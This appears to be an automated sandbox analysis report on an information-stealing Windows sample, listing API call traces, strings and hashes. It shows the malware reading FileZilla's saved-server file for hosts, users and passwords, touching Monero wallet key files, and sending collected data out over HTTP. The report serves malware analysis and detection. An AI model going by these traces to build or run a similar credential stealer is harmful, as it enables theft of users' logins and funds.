StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B90463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B90475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B90502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B9051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B90532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B9054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00B90562
lstrcat.KERNEL32(?,profile: null), ref: 00B90571
lstrcat.KERNEL32(?,url: ), ref: 00B90580
lstrcat.KERNEL32(?,00000000), ref: 00B90593
lstrcat.KERNEL32(?,00BA1678), ref: 00B905A2
lstrcat.KERNEL32(?,00000000), ref: 00B905B5
lstrcat.KERNEL32(?,00BA167C), ref: 00B905C4
lstrcat.KERNEL32(?,login: ), ref: 00B905D3
lstrcat.KERNEL32(?,00000000), ref: 00B905E6
lstrcat.KERNEL32(?,00BA1688), ref: 00B905F5
lstrcat.KERNEL32(?,password: ), ref: 00B90604
lstrcat.KERNEL32(?,00000000), ref: 00B90617
lstrcat.KERNEL32(?,00BA1698), ref: 00B90626
lstrcat.KERNEL32(?,00BA169C), ref: 00B90635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B9068E

Strings

<Host>, xrefs: 00B9037C
<Pass encoding="base64">, xrefs: 00B9045A
browser: FileZilla, xrefs: 00B90559
login: , xrefs: 00B905CA
profile: null, xrefs: 00B90568
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00B902A4
<Port>, xrefs: 00B903C6
password: , xrefs: 00B905FB
url: , xrefs: 00B90577
<User>, xrefs: 00B90410

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 7202203ceba624b91a77ce69628015bdc7f5d86c30fa7a9ff6500653fde9fedd
Instruction ID: 242950124cb6ff445ec90ea3c60364648978348f8f212cc5014f54a904d7c6f9
Opcode Fuzzy Hash: 7202203ceba624b91a77ce69628015bdc7f5d86c30fa7a9ff6500653fde9fedd
Instruction Fuzzy Hash: C7D10D71910209ABCF04FBE8DD96EEE77B8BF15300F5445A8F502B6191DE74AA06CBA1

Function 00B85100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B84839
Part of subcall function 00B847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B84849

lstrlen.KERNEL32(00000000), ref: 00B85193

Part of subcall function 00B98EA0: CryptBinaryToStringA.CRYPT32(00000000,00B85184,40000001,00000000,00000000,?,00B85184), ref: 00B98EC0

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B85207
StrCmpCA.SHLWAPI(?,0133E898), ref: 00B85225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B85340
HttpOpenRequestA.WININET(00000000,0133E918,?,0133E010,00000000,00000000,00400100,00000000), ref: 00B853A4

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0133E8B8,00000000,?,0133A6A0,00000000,?,00BA19DC,00000000,?,00B951CF), ref: 00B85737
lstrlen.KERNEL32(00000000), ref: 00B8574B
GetProcessHeap.KERNEL32(00000000,?), ref: 00B8575C
RtlAllocateHeap.NTDLL(00000000), ref: 00B85763
lstrlen.KERNEL32(00000000), ref: 00B85778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B857A9
lstrlen.KERNEL32(00000000), ref: 00B857C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B857E1
lstrlen.KERNEL32(00000000,?,?), ref: 00B8580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B85822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B8584D
InternetCloseHandle.WININET(00000000), ref: 00B858B1
InternetCloseHandle.WININET(00000000), ref: 00B858BE
InternetCloseHandle.WININET(00000000), ref: 00B858C8

Strings

", xrefs: 00B85482
------, xrefs: 00B85297
------, xrefs: 00B854F9
", xrefs: 00B85706
", xrefs: 00B855C4
------, xrefs: 00B8563B
------, xrefs: 00B853B7
--, xrefs: 00B85280

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: f57d3650380c90bb6c96b760b4ddebe7f818e591e5f1fa2a2190d56795e0c6c7
Instruction ID: 33b15daec516f46a1718fb23a94c44fb836209c45192c4b382c57c0cac1058a7
Opcode Fuzzy Hash: f57d3650380c90bb6c96b760b4ddebe7f818e591e5f1fa2a2190d56795e0c6c7
Instruction Fuzzy Hash: DA320171920128ABDF14EBA4DC95FEEB3B8BF55700F4041E9B106B2191DF706A49CFA6

Function 00B8A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9AA70: StrCmpCA.SHLWAPI(01339110,00B8A7A7,?,00B8A7A7,01339110), ref: 00B9AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B8AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 00B8AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 00B8ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B8A8B0

Part of subcall function 00B9A820: lstrlen.KERNEL32(00B84F05,?,?,00B84F05,00BA0DDE), ref: 00B9A82B
Part of subcall function 00B9A820: lstrcpy.KERNEL32(00BA0DDE,00000000), ref: 00B9A885

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

lstrcat.KERNEL32(?,00000000), ref: 00B8ACEB
lstrcat.KERNEL32(?,00BA1320), ref: 00B8ACFA
lstrcat.KERNEL32(?,00000000), ref: 00B8AD0D
lstrcat.KERNEL32(?,00BA1324), ref: 00B8AD1C
lstrcat.KERNEL32(?,00000000), ref: 00B8AD2F
lstrcat.KERNEL32(?,00BA1328), ref: 00B8AD3E
lstrcat.KERNEL32(?,00000000), ref: 00B8AD51
lstrcat.KERNEL32(?,00BA132C), ref: 00B8AD60
lstrcat.KERNEL32(?,00000000), ref: 00B8AD73
lstrcat.KERNEL32(?,00BA1330), ref: 00B8AD82
lstrcat.KERNEL32(?,00000000), ref: 00B8AD95
lstrcat.KERNEL32(?,00BA1334), ref: 00B8ADA4
lstrcat.KERNEL32(?,00000000), ref: 00B8ADB7
lstrlen.KERNEL32(?), ref: 00B8AE0D
lstrlen.KERNEL32(?), ref: 00B8AE1C

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

DeleteFileA.KERNEL32(00000000), ref: 00B8AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00B8ABD4

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 8228697f278783f62e96ac76315198207bed900be11f59af44c6a7ce5dc46aef
Instruction ID: 28f2e12f33329cd9169c6b2c923557ecb9f160a8db2c4a446a124935d282a50a
Opcode Fuzzy Hash: 8228697f278783f62e96ac76315198207bed900be11f59af44c6a7ce5dc46aef
Instruction Fuzzy Hash: 02122071910119ABDF04FBA4DD96EEE73B8BF14301F5041A9F506B61A1DE34AE09CBB2

Function 00B85960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B84839
Part of subcall function 00B847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B84849

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B859F8
StrCmpCA.SHLWAPI(?,0133E898), ref: 00B85A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B85B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0133E878,00000000,?,0133A6A0,00000000,?,00BA1A1C), ref: 00B85E71
lstrlen.KERNEL32(00000000), ref: 00B85E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00B85E93
RtlAllocateHeap.NTDLL(00000000), ref: 00B85E9A
lstrlen.KERNEL32(00000000), ref: 00B85EAF
lstrlen.KERNEL32(00000000), ref: 00B85ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B85EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00B85F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B85F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B85F4C
InternetCloseHandle.WININET(00000000), ref: 00B85FB0
InternetCloseHandle.WININET(00000000), ref: 00B85FBD
HttpOpenRequestA.WININET(00000000,0133E918,?,0133E010,00000000,00000000,00400100,00000000), ref: 00B85BF8

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

InternetCloseHandle.WININET(00000000), ref: 00B85FC7

Strings

------, xrefs: 00B85A96
------, xrefs: 00B85C0B
", xrefs: 00B85CD5
------, xrefs: 00B85D4C
", xrefs: 00B85E16

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 3425c5ef25ea33d8bf7451785dd3cadd7d042f2f1ffa2cb118a48a00a9029d93
Instruction ID: 875f4bb3787fb5b96f441ebf7c5626021997b4bae1e237159a7e9211e776f3dd
Opcode Fuzzy Hash: 3425c5ef25ea33d8bf7451785dd3cadd7d042f2f1ffa2cb118a48a00a9029d93
Instruction Fuzzy Hash: 9C12D171820129ABDF15EBA4DC95FEEB3B8BF14700F5041E9B10AB2191DF706A49CFA5

Function 00B8CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B98B60: GetSystemTime.KERNEL32(00BA0E1A,0133A2B0,00BA05AE,?,?,00B813F9,?,0000001A,00BA0E1A,00000000,?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B98B86

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B8CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B8D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 00B8D0CE
lstrcat.KERNEL32(?,00000000), ref: 00B8D208
lstrcat.KERNEL32(?,00BA1478), ref: 00B8D217
lstrcat.KERNEL32(?,00000000), ref: 00B8D22A
lstrcat.KERNEL32(?,00BA147C), ref: 00B8D239
lstrcat.KERNEL32(?,00000000), ref: 00B8D24C
lstrcat.KERNEL32(?,00BA1480), ref: 00B8D25B
lstrcat.KERNEL32(?,00000000), ref: 00B8D26E
lstrcat.KERNEL32(?,00BA1484), ref: 00B8D27D
lstrcat.KERNEL32(?,00000000), ref: 00B8D290
lstrcat.KERNEL32(?,00BA1488), ref: 00B8D29F
lstrcat.KERNEL32(?,00000000), ref: 00B8D2B2
lstrcat.KERNEL32(?,00BA148C), ref: 00B8D2C1
lstrcat.KERNEL32(?,00000000), ref: 00B8D2D4
lstrcat.KERNEL32(?,00BA1490), ref: 00B8D2E3

Part of subcall function 00B9A820: lstrlen.KERNEL32(00B84F05,?,?,00B84F05,00BA0DDE), ref: 00B9A82B
Part of subcall function 00B9A820: lstrcpy.KERNEL32(00BA0DDE,00000000), ref: 00B9A885

lstrlen.KERNEL32(?), ref: 00B8D32A
lstrlen.KERNEL32(?), ref: 00B8D339

Part of subcall function 00B9AA70: StrCmpCA.SHLWAPI(01339110,00B8A7A7,?,00B8A7A7,01339110), ref: 00B9AA8F

DeleteFileA.KERNEL32(00000000), ref: 00B8D3B4

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: d06243cf46787a33ae66ddad641d6d6e6e329a37b6a987c0f5b9ca440ac53269
Instruction ID: eb219482824fb1e17ee33742916b6abc22175356cf8e0e2922ed691940492a9b
Opcode Fuzzy Hash: d06243cf46787a33ae66ddad641d6d6e6e329a37b6a987c0f5b9ca440ac53269
